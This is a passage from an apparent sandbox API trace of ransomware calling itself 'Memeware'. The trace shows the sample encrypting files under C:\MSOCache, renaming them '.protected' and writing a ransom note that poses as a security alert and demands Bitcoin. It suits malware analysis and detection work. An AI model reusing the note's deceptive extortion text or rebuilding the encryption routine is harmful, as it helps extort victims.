lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4adad8*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0061.763] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.763] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0061.779] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0061.779] CloseHandle (hObject=0xb4) returned 1 [0061.780] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.protected") returned 91 [0061.780] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All 
Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.protected" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml.protected")) returned 1 [0061.780] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0061.780] lstrcmpiW (lpString1="ProPrWW.cab", lpString2="Windows") returned -1 [0061.780] lstrcmpiW (lpString1="ProPrWW.cab", lpString2="Program Files") returned 1 [0061.780] lstrcmpiW (lpString1="ProPrWW.cab", lpString2="Program Files (x86)") returned 1 [0061.780] lstrcmpiW (lpString1="ProPrWW.cab", lpString2="$Recycle.bin") returned 1 [0061.780] lstrcmpiW (lpString1="ProPrWW.cab", lpString2="System Volume Information") returned -1 [0061.780] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 78 [0061.780] StrStrIW (lpFirst="ProPrWW.cab", lpSrch=".protected") returned 0x0 [0061.780] lstrcmpW (lpString1="ProPrWW.cab", lpString2="RESTORE_FILES.txt") returned -1 [0061.780] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0061.780] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0061.780] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) 
returned 0xb4 [0061.781] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 78 [0061.781] StrStrW (lpFirst="ProPrWW.cab", lpSrch=".txt") returned 0x0 [0061.781] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 78 [0061.781] StrStrW (lpFirst="ProPrWW.cab", lpSrch=".rar") returned 0x0 [0061.781] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 78 [0061.781] StrStrW (lpFirst="ProPrWW.cab", lpSrch=".zip") returned 0x0 [0061.781] ReadFile (in: hFile=0xb4, lpBuffer=0x4adad8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4adad8*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0061.798] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.798] WriteFile (in: hFile=0xb4, lpBuffer=0x4adad8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4adad8*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0061.799] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.799] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0062.065] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0062.067] CloseHandle (hObject=0xb4) returned 1 [0062.067] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab.protected") returned 88 [0062.067] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab.protected" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab.protected")) returned 1 [0062.068] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0062.068] lstrcmpiW (lpString1="ProPrWW2.cab", lpString2="Windows") returned -1 [0062.068] lstrcmpiW (lpString1="ProPrWW2.cab", lpString2="Program Files") returned 1 [0062.068] lstrcmpiW (lpString1="ProPrWW2.cab", lpString2="Program Files (x86)") returned 1 [0062.068] lstrcmpiW (lpString1="ProPrWW2.cab", lpString2="$Recycle.bin") returned 1 [0062.068] lstrcmpiW (lpString1="ProPrWW2.cab", lpString2="System Volume Information") returned -1 [0062.068] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 79 [0062.068] StrStrIW (lpFirst="ProPrWW2.cab", lpSrch=".protected") returned 0x0 [0062.068] lstrcmpW (lpString1="ProPrWW2.cab", lpString2="RESTORE_FILES.txt") returned -1 [0062.068] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0062.068] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0062.068] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab" (normalized: "c:\\msocache\\all 
users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0062.070] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 79 [0062.070] StrStrW (lpFirst="ProPrWW2.cab", lpSrch=".txt") returned 0x0 [0062.070] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 79 [0062.070] StrStrW (lpFirst="ProPrWW2.cab", lpSrch=".rar") returned 0x0 [0062.070] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 79 [0062.070] StrStrW (lpFirst="ProPrWW2.cab", lpSrch=".zip") returned 0x0 [0062.070] ReadFile (in: hFile=0xb4, lpBuffer=0x4adad8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4adad8*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0062.093] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0062.093] WriteFile (in: hFile=0xb4, lpBuffer=0x4adad8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4adad8*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0062.093] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0062.093] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0062.113] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: 
lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0062.113] CloseHandle (hObject=0xb4) returned 1 [0062.113] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab.protected") returned 89 [0062.113] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab.protected" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab.protected")) returned 1 [0062.114] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0062.114] lstrcmpiW (lpString1="setup.exe", lpString2="Windows") returned -1 [0062.114] lstrcmpiW (lpString1="setup.exe", lpString2="Program Files") returned 1 [0062.114] lstrcmpiW (lpString1="setup.exe", lpString2="Program Files (x86)") returned 1 [0062.114] lstrcmpiW (lpString1="setup.exe", lpString2="$Recycle.bin") returned 1 [0062.114] lstrcmpiW (lpString1="setup.exe", lpString2="System Volume Information") returned -1 [0062.114] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 76 [0062.114] StrStrIW (lpFirst="setup.exe", lpSrch=".protected") returned 0x0 [0062.114] lstrcmpW (lpString1="setup.exe", lpString2="RESTORE_FILES.txt") returned 1 [0062.114] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0062.117] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, 
pdwDataLen=0x295f154*=0x30) returned 1 [0062.118] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0062.118] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 76 [0062.118] StrStrW (lpFirst="setup.exe", lpSrch=".txt") returned 0x0 [0062.118] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 76 [0062.118] StrStrW (lpFirst="setup.exe", lpSrch=".rar") returned 0x0 [0062.118] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 76 [0062.118] StrStrW (lpFirst="setup.exe", lpSrch=".zip") returned 0x0 [0062.118] ReadFile (in: hFile=0xb4, lpBuffer=0x4adad8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4adad8*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0062.127] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0062.127] WriteFile (in: hFile=0xb4, lpBuffer=0x4adad8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4adad8*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0062.128] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0062.128] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, 
lpOverlapped=0x0) returned 1 [0062.144] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0062.144] CloseHandle (hObject=0xb4) returned 1 [0062.145] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe.protected") returned 86 [0062.145] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe.protected" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe.protected")) returned 1 [0062.145] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0062.145] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0062.145] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files") returned 1 [0062.145] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files (x86)") returned 1 [0062.145] lstrcmpiW (lpString1="Setup.xml", lpString2="$Recycle.bin") returned 1 [0062.145] lstrcmpiW (lpString1="Setup.xml", lpString2="System Volume Information") returned -1 [0062.145] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0062.145] StrStrIW (lpFirst="Setup.xml", lpSrch=".protected") returned 0x0 [0062.145] lstrcmpW (lpString1="Setup.xml", lpString2="RESTORE_FILES.txt") returned 1 [0062.145] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0062.145] CryptEncrypt (in: 
hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0062.145] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0062.146] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0062.146] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0062.146] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0062.146] StrStrW (lpFirst="Setup.xml", lpSrch=".rar") returned 0x0 [0062.146] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0062.146] StrStrW (lpFirst="Setup.xml", lpSrch=".zip") returned 0x0 [0062.146] ReadFile (in: hFile=0xb4, lpBuffer=0x4adad8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4adad8*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0062.155] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0062.155] WriteFile (in: hFile=0xb4, lpBuffer=0x4adad8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4adad8*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0062.156] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0062.156] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, 
nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0062.164] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0062.164] CloseHandle (hObject=0xb4) returned 1 [0062.164] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.protected") returned 86 [0062.164] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.protected" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml.protected")) returned 1 [0062.165] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0062.165] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0062.165] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\RESTORE_FILES.txt") returned 84 [0062.165] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\RESTORE_FILES.txt" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0062.165] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0062.165] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0062.166] lstrlenA (lpString="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") returned 684 [0062.166] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0062.166] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0062.166] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0062.166] CloseHandle (hObject=0xa4) returned 1 [0062.166] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0062.166] lstrcmpiW (lpString1="{91140000-003B-0000-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0062.166] lstrcmpiW (lpString1="{91140000-003B-0000-1000-0000000FF1CE}-C", lpString2="Program Files") returned -1 [0062.166] lstrcmpiW (lpString1="{91140000-003B-0000-1000-0000000FF1CE}-C", lpString2="Program Files (x86)") returned -1 [0062.166] lstrcmpiW (lpString1="{91140000-003B-0000-1000-0000000FF1CE}-C", lpString2="$Recycle.bin") returned 1 [0062.166] lstrcmpiW (lpString1="{91140000-003B-0000-1000-0000000FF1CE}-C", lpString2="System Volume Information") returned -1 [0062.166] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C") returned 66 [0062.166] lstrcmpW (lpString1="{91140000-003B-0000-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0062.166] lstrcmpW (lpString1="{91140000-003B-0000-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0062.166] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\*") returned 68 [0062.167] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x447cc0 [0062.173] lstrcmpiW 
(lpString1=".", lpString2="Windows") returned -1 [0062.173] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0062.173] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0062.173] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0062.173] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0062.174] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\.") returned 68 [0062.174] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0062.174] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0062.174] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0062.174] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0062.174] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0062.174] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\." 
(normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0062.174] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0062.174] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0062.174] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0062.174] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0062.174] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0062.174] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0062.174] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\..") returned 69 [0062.174] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0062.174] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0062.174] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0062.174] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0062.174] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0062.174] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, 